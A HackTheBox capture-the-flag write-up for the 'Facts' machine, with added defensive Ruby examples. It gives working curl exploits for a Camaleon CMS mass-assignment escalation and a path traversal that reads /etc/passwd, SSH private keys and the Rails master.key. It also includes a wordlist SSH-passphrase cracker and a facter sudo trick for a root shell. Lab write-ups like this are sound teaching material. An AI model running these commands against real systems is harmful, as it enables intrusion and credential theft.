Task: HackTheBox Facts machine — Camaleon CMS 2.9.0 on Ruby on Rails with Linux privilege escalation. Solution: Exploited two CVEs for CMS privilege escalation and arbitrary file read, cracked encrypted SSH key, then abused sudo permissions on facter utility for root access.
Facts - HackTheBox
Challenge Information
| Field | Value |
|---|---|
| Platform | HackTheBox |
| Name | Facts |
| Category | Web / Linux Privilege Escalation |
| Difficulty | Medium |
| Target | 10.129.22.178 (facts.htb) |
Description
A HackTheBox machine featuring Camaleon CMS running on Ruby on Rails. The attack chain involves exploiting two CVEs in the CMS for privilege escalation and arbitrary file read, cracking an encrypted SSH key, and finally abusing sudo permissions on the facter utility for root access.
Reconnaissance
Port Scanning
nmap -sC -sV 10.129.22.178
Open Ports:
- 22/tcp - SSH (OpenSSH 9.9p1)
- 53/tcp - DNS
- 80/tcp - HTTP (nginx 1.26.3)
Web Application Analysis
The web server hosts Camaleon CMS 2.9.0 running on Ruby on Rails 8.0.2.
Key endpoints discovered:
- /admin/login - Admin login page
- /admin/register - User registration (with captcha)
- /admin/users/{id}/updated_ajax - User update endpoint
User Enumeration
Users discovered on the system:
- trivia - Regular user with SSH access
- william - User with user.txt flag
- root - System administrator
Phase 1: Initial Access - Camaleon CMS Admin
User Registration
First, a new user account was registered via the /admin/register endpoint. This required solving a captcha challenge.
CVE-2025-2304: Mass Assignment Privilege Escalation
Camaleon CMS is vulnerable to mass assignment in the user update functionality. By adding the role=admin parameter to the update request, a regular user can escalate their privileges to administrator.
Vulnerable Endpoint: /admin/users/{id}/updated_ajax
```bash
curl -X POST "http://facts.htb/admin/users/3/updated_ajax" \
  -H "Cookie: _camaleon_cms_session=..." \
  -d "user[role]=admin&user[first_name]=Test&user[last_name]=User"
```
Result: User account elevated to CMS administrator.
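To make the root cause concrete, here is an added plain-Ruby model of the bug and of the fix (this is not Camaleon CMS code; the field names and the "client" role are assumptions). The vulnerable update writes every submitted key to the model; the hardened version allow-lists self-editable fields and only honours `role` when the acting user is already an admin, which is the strong-parameters plus authorization pattern a Rails app should use.

```ruby
# Added example, not Camaleon CMS code. Model of the mass-assignment flaw
# behind CVE-2025-2304 and its fix. Field names and roles are assumptions.
require 'set'

User = Struct.new(:id, :first_name, :last_name, :role)

# Vulnerable pattern: every key the client sends that matches a column is
# written to the model, so user[role]=admin lands in the role column.
def vulnerable_update(user, params, _actor)
  params.each do |key, value|
    user[key.to_sym] = value if user.members.include?(key.to_sym)
  end
  user
end

# Fields a user may change on their own record (the explicit allow-list).
SELF_EDITABLE = Set.new(%w[first_name last_name]).freeze

# Hardened pattern: allow-list the writable fields and add "role" only when
# the acting user is an admin. Returns the updated record plus the keys that
# were dropped; those dropped keys are the signal worth logging and alerting on.
def safe_update(user, params, actor)
  allowed = SELF_EDITABLE.dup
  allowed << 'role' if actor.role == 'admin'
  rejected = params.keys.reject { |k| allowed.include?(k) }
  params.each { |key, value| user[key.to_sym] = value if allowed.include?(key) }
  [user, rejected]
end

# Constructed request body: a self-registered user sending the escalation payload.
PAYLOAD = { 'first_name' => 'Test', 'last_name' => 'User', 'role' => 'admin' }.freeze

# Run the same payload through both code paths for comparison.
def demo
  me = User.new(3, 'New', 'User', 'client')
  vuln = vulnerable_update(me.dup, PAYLOAD, me)
  safe, rejected = safe_update(me.dup, PAYLOAD, me)
  { vulnerable_role: vuln.role, safe_role: safe.role, rejected: rejected }
end
```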
Phase 2: Arbitrary File Read via Path Traversal
CVE-2024-46987: Path Traversal in File Download
The Camaleon CMS admin panel has a file download feature vulnerable to path traversal, allowing reading of arbitrary files on the system.
Vulnerable Endpoint: /admin/media/download_private_file?file=../../../../path
Extracting Sensitive Files
```bash
# Read /etc/passwd
curl "http://facts.htb/admin/media/download_private_file?file=../../../../etc/passwd" \
  -H "Cookie: _camaleon_cms_session=..."

# Read user flag
curl "http://facts.htb/admin/media/download_private_file?file=../../../../home/william/user.txt" \
  -H "Cookie: _camaleon_cms_session=..."

# Read SSH private key
curl "http://facts.htb/admin/media/download_private_file?file=../../../../home/trivia/.ssh/id_ed25519" \
  -H "Cookie: _camaleon_cms_session=..."

# Read Rails master key
curl "http://facts.htb/admin/media/download_private_file?file=../../../../var/www/camaleon/config/master.key" \
  -H "Cookie: _camaleon_cms_session=..."
```
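The defensive counterpart, as an added example rather than code from Camaleon CMS: a lookup that joins the `file=` value straight onto the private-files root (the shape that lets `../` escape), next to a version that normalises the path and refuses anything that resolves outside the root. The root directory is an assumed path.

```ruby
# Added example, not Camaleon CMS code: containing the file= parameter of a
# download endpoint. PRIVATE_ROOT is an assumed location.
PRIVATE_ROOT = '/var/www/camaleon/private'.freeze

# Vulnerable shape: the request value is joined onto the root as-is, so the
# filesystem honours each "../" and the read walks out of the tree.
def vulnerable_resolve(file_param)
  File.join(PRIVATE_ROOT, file_param)
end

# Hardened: normalise first (collapses "." and ".." and absolute paths), then
# require the result to still sit below PRIVATE_ROOT. Returns nil on escape.
# Caveat: expand_path does not follow symlinks; if users can create links
# under the root, apply the same prefix check to File.realpath as well.
def safe_resolve(file_param)
  return nil if file_param.nil? || file_param.empty?
  return nil if file_param.include?("\0")       # NUL would truncate in C-backed calls
  return nil if file_param.start_with?('~')     # expand_path would substitute $HOME
  candidate = File.expand_path(file_param, PRIVATE_ROOT)
  return nil unless candidate.start_with?(PRIVATE_ROOT + '/')
  candidate
end
```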
Key Findings
| File | Content |
|---|---|
| /home/william/user.txt | 988fe10004e4f2c1895e906c743d8d75 |
| /home/trivia/.ssh/id_ed25519 | Encrypted SSH key (bcrypt KDF, 24 rounds) |
| config/master.key | b0650437b2208a9fab449fb92f67bc40 |
| Database | MinIO/S3 credentials |
Phase 3: SSH Key Cracking
The extracted SSH key for user trivia was encrypted with:
- Cipher: aes256-ctr
- KDF: bcrypt (24 rounds)
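The cipher and KDF details above are stored in cleartext in the key file's header, so they can be read without the passphrase. As an added example (not from the writeup), this small parser pulls those fields out of an OpenSSH-format private key, which is also how a defender can audit a key store for unencrypted keys or low bcrypt round counts. The key blob it runs against is constructed in the block with a zero salt and no key material.

```ruby
# Added example, not code from the writeup: read the cleartext header of an
# OpenSSH private key to see how it is protected (cipher, KDF, bcrypt rounds).
# The key used below is constructed header-only, with no real key material.
require 'base64'

MAGIC = "openssh-key-v1\0".b.freeze

# One SSH-style string: 4-byte big-endian length followed by the bytes.
def read_string(blob, offset)
  len = blob[offset, 4].unpack1('N')
  [blob[offset + 4, len], offset + 4 + len]
end

def ssh_string(s)
  [s.bytesize].pack('N') + s.b
end

# Returns cipher, kdf and (for bcrypt) the round count. These fields precede
# the encrypted section, so no passphrase is needed to read them.
def parse_openssh_key_header(pem)
  body = pem.lines.reject { |l| l.start_with?('-----') }.join
  blob = Base64.decode64(body)
  raise ArgumentError, 'not an openssh-key-v1 blob' unless blob.start_with?(MAGIC)
  off = MAGIC.bytesize
  cipher, off = read_string(blob, off)
  kdf, off = read_string(blob, off)
  kdfopts, _off = read_string(blob, off)
  rounds = nil
  if kdf == 'bcrypt'
    _salt, o = read_string(kdfopts, 0)     # kdfoptions = string(salt) || uint32(rounds)
    rounds = kdfopts[o, 4].unpack1('N')
  end
  { cipher: cipher, kdf: kdf, rounds: rounds, encrypted: cipher != 'none' }
end

# Constructed header-only blob for offline testing (not a usable key). The
# defaults mirror the protection found on trivia's key in the writeup.
def constructed_key(cipher: 'aes256-ctr', kdf: 'bcrypt', rounds: 24)
  kdfopts = kdf == 'bcrypt' ? ssh_string("\x00" * 16) + [rounds].pack('N') : ''
  blob = MAGIC + ssh_string(cipher) + ssh_string(kdf) + ssh_string(kdfopts) + [0].pack('N')
  "-----BEGIN OPENSSH PRIVATE KEY-----\n#{Base64.strict_encode64(blob)}\n-----END OPENSSH PRIVATE KEY-----\n"
end
```

Run it against a real id_ed25519 and a `kdf` of `none` means the key is stored unencrypted; a low `rounds` value means each passphrase guess is cheap.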
Cracking Script
```python
#!/usr/bin/env python3
"""
SSH Key Passphrase Cracker for bcrypt-encrypted Ed25519 keys
"""
import subprocess


def try_passphrase(keyfile, passphrase):
    """Try to decrypt SSH key with given passphrase.

    ssh-keygen -y derives the public key from the private key, which only
    succeeds (exit code 0) when the passphrase unlocks it.
    """
    try:
        result = subprocess.run(
            ['ssh-keygen', '-y', '-P', passphrase, '-f', keyfile],
            capture_output=True,
            timeout=5
        )
        return result.returncode == 0
    except (subprocess.TimeoutExpired, OSError):
        return False


def main():
    keyfile = 'ssh_key_trivia.txt'
    wordlist = '/usr/share/wordlists/rockyou.txt'
    with open(wordlist, 'r', errors='ignore') as f:
        for i, line in enumerate(f):
            passphrase = line.strip()
            if try_passphrase(keyfile, passphrase):
                print(f"[+] Found passphrase: {passphrase}")
                return
            if i % 1000 == 0:
                print(f"[*] Tried {i} passwords...")
    print("[-] Passphrase not found")


if __name__ == '__main__':
    main()
```
Result: Passphrase found: dragonballz
SSH Access
```bash
chmod 600 ssh_key_trivia.txt
ssh -i ssh_key_trivia.txt trivia@facts.htb
# Enter passphrase: dragonballz
```
Phase 4: Privilege Escalation - Facter GTFOBins
Checking Sudo Permissions
```
trivia@facts:~$ sudo -l
User trivia may run the following commands on facts:
    (ALL) NOPASSWD: /usr/bin/facter
```
About Facter
Facter is a Ruby-based system profiling tool from Puppet. It collects system facts and can load custom facts from specified directories.
GTFOBins Exploitation
Facter's --custom-dir option allows loading arbitrary Ruby code as custom facts:
```bash
# Create malicious custom fact
mkdir -p /tmp/pwn
cat > /tmp/pwn/x.rb << 'EOF'
Facter.add(:x) do
  setcode do
    system("cat /root/root.txt")
  end
end
EOF

# Execute with sudo
sudo /usr/bin/facter --custom-dir=/tmp/pwn x
```
Result: d44282dbea340ae6177973eec1162bc0
Alternative: Getting a Root Shell
```bash
cat > /tmp/pwn/shell.rb << 'EOF'
Facter.add(:shell) do
  setcode do
    system("/bin/bash")
  end
end
EOF
sudo /usr/bin/facter --custom-dir=/tmp/pwn shell
```
Flags
| Flag | Value |
|---|---|
| User | 988fe10004e4f2c1895e906c743d8d75 |
| Root | d44282dbea340ae6177973eec1162bc0 |
Attack Chain Summary
```text
[Reconnaissance]
       |
       v
[Register User on Camaleon CMS]
       |
       v
[CVE-2025-2304: Mass Assignment -> Admin]
       |
       v
[CVE-2024-46987: Path Traversal -> File Read]
       |
       +---> user.txt (User Flag)
       |
       +---> SSH Key (encrypted)
       |
       v
[Crack SSH Key Passphrase: dragonballz]
       |
       v
[SSH as trivia]
       |
       v
[sudo -l: facter NOPASSWD]
       |
       v
[GTFOBins: facter --custom-dir]
       |
       v
[Root Flag]
```
Key Vulnerabilities
| CVE | Description | Impact |
|---|---|---|
| CVE-2025-2304 | Camaleon CMS Mass Assignment | Privilege escalation to admin |
| CVE-2024-46987 | Camaleon CMS Path Traversal | Arbitrary file read |
| N/A | Weak SSH key passphrase | Credential compromise |
| N/A | Sudo misconfiguration (facter) | Root privilege escalation |
Key Indicators
Use these techniques when you see:
- Camaleon CMS or Ruby on Rails applications with user management
- File download endpoints with a `file=` parameter
- Encrypted SSH keys with bcrypt KDF (try common wordlists)
- `facter` in `sudo -l` output (GTFOBins candidate)
- Any Puppet-related tools with sudo access
Tools Used
| Tool | Purpose |
|---|---|
| curl | HTTP requests, exploiting web vulnerabilities |
| ssh-keygen | SSH key operations, passphrase verification |
| sshpass | Automated SSH with passphrase |
| Python | Custom SSH key cracking script |
| sqlite3 | Database analysis |
Lessons Learned
- Mass Assignment Vulnerabilities: Always check for mass assignment in web frameworks, especially in user update endpoints. Adding unexpected parameters like `role=admin` can lead to privilege escalation.
- Path Traversal in File Downloads: File download functions are common targets for path traversal. The `../` sequences can often bypass basic filters.
- SSH Key Security: Encrypted SSH keys with weak passphrases provide false security. Common wordlists like rockyou.txt can crack them quickly.
- GTFOBins for Privilege Escalation: Always check GTFOBins (https://gtfobins.github.io/) when you find sudo permissions. Tools like `facter` that can load external code are prime targets.
- Facter Custom Facts: Facter's ability to load Ruby code from custom directories makes it dangerous when available via sudo.